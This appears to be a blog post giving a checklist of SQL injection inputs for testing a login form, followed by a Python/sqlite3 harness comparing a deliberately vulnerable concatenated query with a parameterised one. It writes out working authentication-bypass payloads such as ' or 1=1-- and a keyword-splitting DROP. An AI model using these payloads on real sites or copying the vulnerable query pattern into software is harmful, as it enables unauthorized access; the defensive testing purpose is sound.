The first input fields I like to test on a website are the "search engine" and the "login form"; the examples below test a "login form". In production you should aim to suppress any error messages and server responses, and leave them to the developers for debugging. We will assume the receiving script builds a worst-case SQL statement:
SELECT *
FROM users
WHERE username=''
AND password=''
1. Random SQL: enter some random SQL-like text as the input values and see whether the server returns a message.
Username: SELECT Username FROM Users WHERE ID=1
Password: SELECT MD5(Password) FROM Users WHERE ID=1
-- evaluates to:
SELECT * FROM users WHERE username='SELECT Username FROM Users WHERE ID=1' AND password='SELECT MD5(Password) FROM Users WHERE ID=1'
Result should be "invalid username/password". Suppress any other messages.
2. Wildcards: enter an asterisk (*) as the input value and observe the result.
Username: *
Password: <Leave Blank>
-- evaluates to:
SELECT * FROM users WHERE username='*' AND password=''
Result should be "invalid username/password".
3. Comments - dashdash: enter a username known to exist (e.g. admin) as the input, suffixed with the comment sequence (e.g. --).
Username: admin'--
Password:
-- evaluates to:
SELECT * FROM users WHERE username='admin'--' AND password=''
Result should be "invalid username/password".
4. Comments - hash: enter a username known to exist (e.g. admin) as the input, suffixed with the comment sequence (e.g. #).
Username: admin'#
Password:
-- evaluates to:
SELECT * FROM users WHERE username='admin'#' AND password=''
Result should be "invalid username/password".
5. Comments - bypassing pattern matches: tests whether the target system is looking for keywords such as DROP, or relies on a blacklist that can be sidestepped.
Username: ';DR/**/OP tempTable;
Password:
-- evaluates to:
SELECT * FROM users WHERE username='';DROP tempTable;' AND password=''
6. The Classic: enter ' OR 1=1-- as the input value, replacing "admin" with a username known to exist.
Username: admin
Password: ' or 1=1--
-- evaluates to:
SELECT * FROM users WHERE username='admin' AND password='' OR 1=1--'
Quick variations of this (which one applies depends mainly on what error is returned; then try it against the specific application):
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
7. Variations of the Classic: Comments. Depending on the specific system, try entering comment syntax, replacing "admin" with a username known to exist.
Username: admin
Password: ' or 1=1 --IamJOE
-- evaluates to:
SELECT * FROM users WHERE username='admin' AND password='' OR 1=1 --IamJOE'
8. Variations of the Classic: Empty. Enter something like ' or ''=', replacing "admin" with a username known to exist.
Username: admin
Password: ' or ''='
-- evaluates to:
SELECT * FROM users WHERE username='admin' AND password='' OR ''=''
9. Variations of the Classic: NewLines. Some scripts cannot handle a newline: it is treated as another query, or the script trims the last line of what was submitted. Replace "admin" with a username known to exist.
Username: admin
Password: '
OR 1=1--
-- evaluates to:
SELECT * FROM users WHERE username='admin' AND password=''
OR 1=1--'
**New lines in SQL should be understood as \r\n.
10. Variations of the Classic: URL Encoded. Although it can get past escaping of the ' character, this is most likely to be the way a system is attacked. In fact, every attack on this page can be URL-encoded. Enter the following as the input value: %27%20or%20%27%27%3D%27.
Username: admin
Password: %27%20or%20%27%27%3D%27
-- evaluates to:
SELECT * FROM users WHERE username='admin' AND password='' OR ''=''
11. Guest Password: if you know a valid username/password pair, check that your scripts do not validate on the password alone (empty password).
Username: Guest
Password: <Password you know exists in system>
-- evaluates to:
SELECT * FROM users WHERE username='Guest' AND password=''
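As an added example, not code from the original post, here is the whole checklist above run against a Python/sqlite3 login check written two ways: the concatenated statement the post assumes the receiving script builds, and the same query with bound parameters. The user table, its rows and passwords are constructed sample data; item 10 is URL-decoded in the harness to simulate the web framework's form decoding before the script sees the value. The defender's reading of the output: every item must come back "invalid username/password" from the parameterised version, and any item where the two versions disagree is the finding.

```python
import sqlite3
from urllib.parse import unquote

INVALID = "invalid username/password"   # the only message a production login should return


def build_db():
    """Constructed in-memory user table (sample data, not from any real system).
    Passwords are stored in clear text only so the statement mirrors the post's
    `username='' AND password=''` comparison; a real system stores a password hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "hunter2"), ("Guest", "guest"), ("joe", "s3cret")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The receiving script the post assumes: user input concatenated into the SQL text."""
    sql = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    try:
        row = conn.execute(sql).fetchone()
    except (sqlite3.Error, sqlite3.Warning):
        # syntax error or a second statement: swallow it, as the post advises for production
        return INVALID
    return "ok" if row else INVALID


def login_hardened(conn, username, password):
    """Same check with bound parameters: input is data, never SQL text, so every
    payload below is compared literally against the stored column values."""
    row = conn.execute("SELECT * FROM users WHERE username=? AND password=?",
                       (username, password)).fetchone()
    return "ok" if row else INVALID


# The post's test inputs, keyed by its item numbers. Item 10 is URL-decoded here,
# simulating what the web framework does before the script receives the form value.
CHECKLIST = {
    "1 random sql": ("SELECT Username FROM Users WHERE ID=1",
                     "SELECT MD5(Password) FROM Users WHERE ID=1"),
    "2 wildcard": ("*", ""),
    "3 comment --": ("admin'--", ""),
    "4 comment #": ("admin'#", ""),
    "5 split keyword": ("';DR/**/OP tempTable;", ""),
    "6 classic": ("admin", "' or 1=1--"),
    "7 classic, named comment": ("admin", "' or 1=1 --IamJOE"),
    "8 classic, empty": ("admin", "' or ''='"),
    "9 classic, newline": ("admin", "'\r\nOR 1=1--"),
    "10 classic, url encoded": ("admin", unquote("%27%20or%20%27%27%3D%27")),
    "11 guest with another user's password": ("Guest", "hunter2"),
}


def run_checklist(conn):
    """Return {item: (concatenated result, parameterised result)} for every post input."""
    return {name: (login_vulnerable(conn, u, p), login_hardened(conn, u, p))
            for name, (u, p) in CHECKLIST.items()}


if __name__ == "__main__":
    db = build_db()
    for name, (vuln, safe) in run_checklist(db).items():
        flag = "  <-- bypass" if vuln != INVALID else ""
        print(f"{name:40s} concatenated={vuln!r:32s} parameterised={safe!r}{flag}")
```

Run it directly to print a side-by-side table; the rows flagged `<-- bypass` are the items where the concatenated statement returns a user row while the parameterised one does not. Note that the concatenated version also returns the fixed message on a database error (item 4 is a syntax error under sqlite), which is the "suppress any other messages" rule from the top of the post applied in code: the client learns nothing about the statement either way, and the disagreement between the two columns is visible only to whoever runs the checklist.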
sql百态01-post